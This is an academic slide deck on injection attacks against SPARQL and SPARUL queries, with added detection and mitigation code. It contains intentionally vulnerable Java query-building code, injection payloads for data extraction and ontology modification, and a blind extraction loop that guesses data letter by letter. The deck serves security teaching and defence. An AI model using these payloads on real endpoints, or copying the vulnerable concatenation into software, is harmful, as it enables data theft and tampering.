Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

Pablo Orduña, Aitor Almeida, Unai Aguilera, Xabier Laiseca, Diego López-de-Ipiña, Aitor Gómez-Goiri
September 9th, 2010

Future Internet - Collaborative strategic research programme; ETORTEK 2008

Outline: Introduction (Query Languages, Security issues); Vulnerable code samples (SPARQL Injection, Blind SPARQL Injection, SPARUL Injection); Addressing code injection; Conclusions
Slide 2: Introduction

The Semantic Web is based on a set of technologies:
- XML
- RDF
- OWL
- ...
Slide 3: Query Languages

- New technologies have been developed to query the ontologies, each one later than the previous: RDQL -> SPARQL -> SPARUL
- These new query languages are based on SQL
- RDQL and SPARQL are read-only query languages; SPARUL (SPARQL/Update) introduces modification capabilities

SPARQL sample:

```sparql
PREFIX injection: <http://www.morelab.deusto.es/injection.owl#>
SELECT ?p1
WHERE {
  ?p1 a injection:Person .
}
```
Slide 4: Security issues

- The use of these new query languages introduces vulnerabilities already found in the misuse of earlier query languages
- Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known
- Libraries provide tools to sanitize user input in these languages
- A proper usage of the query languages is required in order to face new techniques, including:
  - (Blind) SPARQL Injection
  - SPARUL Injection
Slide 5: Introducing SPARQL Injection

- The following query is assumed to retrieve the friends of a user whose fullName is provided by the variable name
- The ontology is available at http://www.morelab.deusto.es/injection.owl
Slide 6: SPARQL Injection

```java
// name: the user-supplied full name, concatenated into the query text as-is
String queryString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?name1 ?name2 " +
    "WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + name + "' . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "  ?p1 injection:fullName ?name1 . " +
    "  ?p2 injection:fullName ?name2 . " +
    "}";
Query query = QueryFactory.create(queryString);
```
Slide 7: Introducing SPARQL Injection

- This code can be exploited to retrieve any information in the ontology
- The problem is that the variable name has not been sanitized
- This variable can include SPARQL code, and thus modify the query itself
- A variable with malicious content can be found in the next slide
Slide 8: Appending the Strings

```java
// The malicious value of name (declared first so that the snippet compiles as written)
String name = "Pablo Orduna' . " +
    "?b1 a injection:Building . " +
    "?b1 injection:name ?name1 . " +
    "} #";
String queryString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?name1 ?name2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + name + "' . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "  ?p1 injection:fullName ?name1 . " +
    "  ?p2 injection:fullName ?name2 . " +
    "}";
```
Slide 9: Appending the Strings

```java
// The same query with the value of name substituted in place
String queryString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?name1 ?name2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + "Pablo Orduna' . " +
    "  ?b1 a injection:Building . " +
    "  ?b1 injection:name ?name1 . " +
    "  } #" + "' . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "  ?p1 injection:fullName ?name1 . " +
    "  ?p2 injection:fullName ?name2 . " +
    "}";
```
Slide 10: The final query

```java
String queryString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?name1 ?name2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName 'Pablo Orduna' . " +
    "  ?b1 a injection:Building . " +
    "  ?b1 injection:name ?name1 . " +
    "  } #" + /* From this point everything is commented and thus ignored */ "' . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "  ?p1 injection:fullName ?name1 . " +
    "  ?p2 injection:fullName ?name2 . " +
    "}";
```
Slide 11: SPARQL Injection

- This code will return the name of the building instead of the name of a user
- It is possible to use the flexibility of SPARQL to perform other kinds of queries, retrieving any information in the ontology
Slide 12: Introducing Blind SPARQL Injection

- The previous sample was especially vulnerable since it returned a string: it is possible to retrieve any information as a string
- Strings are usually not retrieved in SPARQL, but individuals
- What if the returned value is an individual? It is still possible to retrieve any information
- If it is possible to know whether a given query is true or false, it is possible to iteratively retrieve any information
- The following code retrieves the individuals themselves; it is possible to know whether the query returned individuals or not
Slide 13: Blind SPARQL Injection

```java
// name: the user-supplied full name, again concatenated into the query text
String queryString =
    "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?p1 ?p2 " +
    "WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + name + "'^^xsd:string . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "}";
Query query = QueryFactory.create(queryString);
```
Slide 14: Blind SPARQL Injection

- Once again, the variable name has not been sanitized, so it is still possible to inject SPARQL code
- The injected code cannot return a building or the building name
- But, adding a condition like "does the building name start with this letter?", we will get:
  - The usual results -> the building name starts with that letter
  - No results -> the building name does not start with that letter
Slide 15: Blind SPARQL Injection

```java
// s: the prefix currently being tested (the argument passed to tryBlind on slide 17)
String name = "Pablo Orduna' . " +
    "?b1 a injection:Building . " +
    "?b1 injection:name ?buildingName . " +
    "FILTER regex(?buildingName, \"^" + s + ".*\") . " +
    "} #"; // }:-D
String queryString = /* PREFIXES ... */
    "SELECT ?p1 ?p2 " +
    "WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + name + "'^^xsd:string . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "}";
```
Slide 16: The final query would be...

```java
String queryString =
    "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?p1 ?p2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName 'Pablo Orduna' . " +
    "  ?b1 a injection:Building . " +
    "  ?b1 injection:name ?buildingName . " +
    "  FILTER regex(?buildingName, \"^" + s + ".*\") . " +
    "  } #" + /* from here ignored */ "'^^xsd:string . " +
    "  ?p1 injection:isFriendOf ?p2 . }";
```
Slide 17: Querying recursively...

```java
// POSSIBLE_LETTERS: the charset tried at each position; tryBlind(prefix) runs the
// query of slide 15 with s = prefix and returns true if it returned any result
public static String recursively(String letters) throws Exception {
    for (int i = 0; i < POSSIBLE_LETTERS.length(); ++i) {
        char c = POSSIBLE_LETTERS.charAt(i);
        if (tryBlind(letters + c)) {
            System.out.println(c);
            return "" + c + recursively(letters + c);
        }
    }
    return "";
}
```
Slide 18: Blind SPARQL Injection

- It is possible to optimize this system using binary search
- Performing queries using regular expressions like ^[A-M].* tells whether the character is between A and M
- Given a charset of length 64, we would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60)
- Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160)
- The point is that it is possible to retrieve any information in the ontology independently of the values returned by the query
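The blind technique on slides 14 to 18 has a defensive corollary: every tested character (or bisection step) costs the attacker one request carrying SPARQL syntax in a field that should hold a person's name, so the attempts are visible in the application's own parameter log. The following audit routine is an added example, not code from the slides or from the authors; the log format, the client addresses and the sample values are constructed for it, and the payload shapes are those shown on slides 8, 15 and 21.

```java
// Added example (not from the slides): flags user-supplied parameter values that
// carry SPARQL syntax and counts flagged requests per client, so that the
// many-requests-per-character pattern of blind extraction stands out.
// Log format "<timestamp> client=<addr> param=<name> value=<text>" is constructed.
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class SparqlParamAudit {

    // Things a plain full name should never contain but every payload on the slides does:
    // a closing brace or the comment character '#', an update/filter keyword, a quote
    // followed by a triple terminator or a variable, or a SPARQL codepoint escape
    // (backslash, 'u', four hex digits), which the parser turns into the escaped character.
    private static final Pattern SUSPICIOUS = Pattern.compile(
            "[}#]|\\bFILTER\\b|\\bINSERT\\b|\\bDELETE\\b|['\"]\\s*[.?]|\\\\u[0-9a-fA-F]{4}",
            Pattern.CASE_INSENSITIVE);

    public static boolean isSuspicious(String value) {
        return SUSPICIOUS.matcher(value).find();
    }

    /** Returns, for each client that sent at least one flagged value, how many it sent. */
    public static Map<String, Integer> audit(List<String> logLines) {
        Map<String, Integer> perClient = new HashMap<String, Integer>();
        for (String line : logLines) {
            int c = line.indexOf("client=");
            int v = line.indexOf(" value=");
            if (c < 0 || v < 0) continue;                       // not a parameter log line
            String client = line.substring(c + "client=".length(), line.indexOf(' ', c));
            String value = line.substring(v + " value=".length());
            if (isSuspicious(value)) {
                Integer n = perClient.get(client);
                perClient.put(client, n == null ? 1 : n + 1);
            }
        }
        return perClient;
    }

    public static void main(String[] args) {
        // Constructed log lines: two ordinary lookups and four injection attempts,
        // the last three of which are the per-letter probes of a blind extraction.
        List<String> lines = new ArrayList<String>();
        lines.add("2010-09-09T10:00:01 client=198.51.100.7 param=name value=Pablo Orduna");
        lines.add("2010-09-09T10:00:02 client=198.51.100.7 param=name value=Aitor Almeida");
        lines.add("2010-09-09T10:00:03 client=203.0.113.9 param=name value=Pablo Orduna' . "
                + "?b1 a injection:Building . ?b1 injection:name ?name1 . } #");
        lines.add("2010-09-09T10:00:04 client=203.0.113.9 param=name value=Pablo Orduna' . "
                + "?b1 injection:name ?bn . FILTER regex(?bn, \"^A.*\") . } #");
        lines.add("2010-09-09T10:00:05 client=203.0.113.9 param=name value=Pablo Orduna' . "
                + "?b1 injection:name ?bn . FILTER regex(?bn, \"^B.*\") . } #");
        lines.add("2010-09-09T10:00:06 client=203.0.113.9 param=name value=Pablo Orduna\\u0027 . } #");

        Map<String, Integer> flagged = audit(lines);
        for (Map.Entry<String, Integer> e : flagged.entrySet()) {
            System.out.println(e.getKey() + " sent " + e.getValue() + " suspicious values");
        }
    }
}
```

With the constructed lines only the second client is reported, with four flagged values. A single quote on its own is deliberately not a signal, since names such as O'Brien are legitimate; the structural tokens (`}`, `#`, a keyword, or a quote followed by `.`/`?`) are what distinguish the payloads on the slides from ordinary input. Alerting on a per-client count over a short window is what catches the blind variant, which needs tens of requests per extracted character.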
Slide 19: Introducing SPARQL/Update Injection

- All the previous examples are executed in read-only query languages
- SPARUL introduces the chance to modify the ontology
- INSERT, MODIFY and DELETE statements are available
- The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name
Slide 20: SPARUL Injection

```java
// name: the user-supplied new full name, concatenated into the update text as-is
String updateString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
    "DELETE {" +
    "  injection:Pablo injection:fullName ?name1 " +
    "} WHERE {" +
    "  injection:Pablo injection:fullName ?name1" +
    "}\n INSERT {" +
    "  injection:Pablo injection:fullName '" + name + "'^^xsd:string" +
    "}";
UpdateRequest update = UpdateFactory.create(updateString);
```
Slide 21: SPARUL Injection

```java
String name = "Pablo Ordunya'^^xsd:string" +
    "} \n " +
    "INSERT {" +
    "  injection:Pablo injection:isFriendOf injection:EvilMonkey" +
    "} #"; // }:-D
String result = sample.run(name);
```

With this vulnerability, it is possible to modify the whole ontology.
Slide 22: Addressing code injection

- Mechanisms provided by the library must be used (if provided)
- It is not as simple as escaping the ' characters: the string \u0027 is a single quote, just as in Java:

```java
System.out.println("a\u0022.length() + \u0022b".length());
// This code prints "2", the result of ("a".length() + "b".length()),
// since \u0022 is replaced by " even when it is commented or inside a String
```
Slide 23: Frameworks

In Jena, the initialBinding argument can be used in the QueryExecutionFactory:

```java
// queryString uses the variable ?thename where the literal used to be concatenated
// initial binding
QuerySolutionMap initialBinding = new QuerySolutionMap();
RDFNode parameterizedName = model.createLiteral(name);
initialBinding.add("thename", parameterizedName);

// Perform the query
Query query = QueryFactory.create(queryString);
QueryExecution qe = QueryExecutionFactory.create(query, model, initialBinding);
ResultSet results = qe.execSelect();
```
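To show the binding approach of slide 23 end to end, and the SPARUL case of slide 20 handled without assembling any update text, here is an added example that is not code from the slides or from the authors. It assumes Jena 2.x (the com.hp.hpl.jena packages the slides use; Apache Jena 3 and later use the org.apache.jena prefix for the same classes), uses the ontology namespace from the slides, and builds a small in-memory model whose individuals and literals are constructed test data rather than the real injection.owl. The two payloads it feeds in are the ones on slides 8 and 21.

```java
// Added example (not from the slides): the slide 6 lookup with the name bound as an
// RDF term, and the slide 20 rename done through the Model API. Jena 2.x assumed;
// the model contents below are constructed test data.
import com.hp.hpl.jena.query.Query;
import com.hp.hpl.jena.query.QueryExecution;
import com.hp.hpl.jena.query.QueryExecutionFactory;
import com.hp.hpl.jena.query.QueryFactory;
import com.hp.hpl.jena.query.QuerySolution;
import com.hp.hpl.jena.query.QuerySolutionMap;
import com.hp.hpl.jena.query.ResultSet;
import com.hp.hpl.jena.rdf.model.Model;
import com.hp.hpl.jena.rdf.model.ModelFactory;
import com.hp.hpl.jena.rdf.model.Property;
import com.hp.hpl.jena.rdf.model.Resource;
import com.hp.hpl.jena.vocabulary.RDF;
import java.util.ArrayList;
import java.util.List;

public class SafeJenaAccess {
    // Namespace of the ontology used throughout the slides
    static final String NS = "http://www.morelab.deusto.es/injection.owl#";

    // Slide 6 query with the concatenated literal replaced by the variable ?thename.
    // The text is a constant: parsed once, and it never contains user input.
    static final String FRIENDS_QUERY =
        "PREFIX injection: <" + NS + "> " +
        "SELECT ?name2 WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName ?thename . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "  ?p2 injection:fullName ?name2 . " +
        "}";

    /** Friends of the person whose fullName is exactly the given text (slide 23 technique). */
    public static List<String> friendsOf(Model model, String name) {
        QuerySolutionMap initialBinding = new QuerySolutionMap();
        // Bound as an xsd:string literal, the same kind of term the data uses: in Jena 2
        // (RDF 1.0) a plain literal and an xsd:string literal are different terms and
        // would not match each other.
        initialBinding.add("thename", model.createTypedLiteral(name));
        Query query = QueryFactory.create(FRIENDS_QUERY);
        QueryExecution qe = QueryExecutionFactory.create(query, model, initialBinding);
        List<String> names = new ArrayList<String>();
        try {
            ResultSet rs = qe.execSelect();
            while (rs.hasNext()) {
                QuerySolution row = rs.next();
                names.add(row.getLiteral("name2").getString());
            }
        } finally {
            qe.close();
        }
        return names;
    }

    /** Slide 20 update (DELETE the old fullName, INSERT the new one) via the Model API:
     *  the new value becomes a literal object, so no update text is ever parsed. */
    public static void setFullName(Model model, Resource person, String name) {
        Property fullName = model.createProperty(NS, "fullName");
        person.removeAll(fullName);                                   // DELETE { ... } WHERE { ... }
        person.addProperty(fullName, model.createTypedLiteral(name)); // INSERT { ... "name"^^xsd:string }
    }

    /** Constructed test data: two people who are friends, and one building. */
    static Model sampleModel() {
        Model m = ModelFactory.createDefaultModel();
        Property fullName = m.createProperty(NS, "fullName");
        Property isFriendOf = m.createProperty(NS, "isFriendOf");
        Resource person = m.createResource(NS + "Person");
        Resource aitor = m.createResource(NS + "Aitor")
            .addProperty(RDF.type, person)
            .addProperty(fullName, m.createTypedLiteral("Aitor Almeida"));
        m.createResource(NS + "Pablo")
            .addProperty(RDF.type, person)
            .addProperty(fullName, m.createTypedLiteral("Pablo Orduna"))
            .addProperty(isFriendOf, aitor);
        m.createResource(NS + "MoreLab")   // constructed individual
            .addProperty(RDF.type, m.createResource(NS + "Building"))
            .addProperty(m.createProperty(NS, "name"), m.createTypedLiteral("Engineering building"));
        return m;
    }

    public static void main(String[] args) {
        Model model = sampleModel();
        Resource pablo = model.getResource(NS + "Pablo");

        System.out.println(friendsOf(model, "Pablo Orduna"));   // the genuine lookup
        String queryPayload = "Pablo Orduna' . ?b1 a injection:Building . ?b1 injection:name ?name2 . } #";
        System.out.println(friendsOf(model, queryPayload));     // compared as one value, never parsed

        String updatePayload = "Pablo Ordunya'^^xsd:string\n} \nINSERT {"
            + " injection:Pablo injection:isFriendOf injection:EvilMonkey } #";
        setFullName(model, pablo, updatePayload);
        System.out.println(pablo.listProperties(model.createProperty(NS, "isFriendOf")).toList().size());
        System.out.println(pablo.getProperty(model.createProperty(NS, "fullName")).getString());
    }
}
```

With the constructed data the first lookup returns Aitor's name and the second returns nothing: the whole slide 8 payload is matched against fullName as one literal value, so the Building pattern it carries is never part of the query. After `setFullName` with the slide 21 payload, Pablo still has no isFriendOf triples; his fullName is simply an odd-looking string. Later Jena releases also ship `ParameterizedSparqlString`, whose `setLiteral`, `asQuery()` and `asUpdate()` methods escape bound values for the cases where the text really has to be assembled as a string; the binding and Model API routes above need no escaping at all, which is why the `\u0027` problem from slide 22 does not arise.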
Slide 24: Conclusions

- Not sanitizing the user input might add a set of security vulnerabilities to our systems
- The paper presents how new query languages inherit security issues present in older query languages, and therefore these issues should also be taken into account when working with them
Slide 25: Questions?

DeustoTech - Internet
http://www.morelab.deusto.es

- Pablo Orduña: pablo.orduna@deusto.es
- Aitor Almeida: aitor.almeida@deusto.es
- Unai Aguilera: unai.aguilera@deusto.es
- Xabier Laiseca: xabier.laiseca@deusto.es
- Diego López-de-Ipiña: dipina@deusto.es
- Aitor Gómez-Goiri: aitor.gomez@deusto.es

Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages
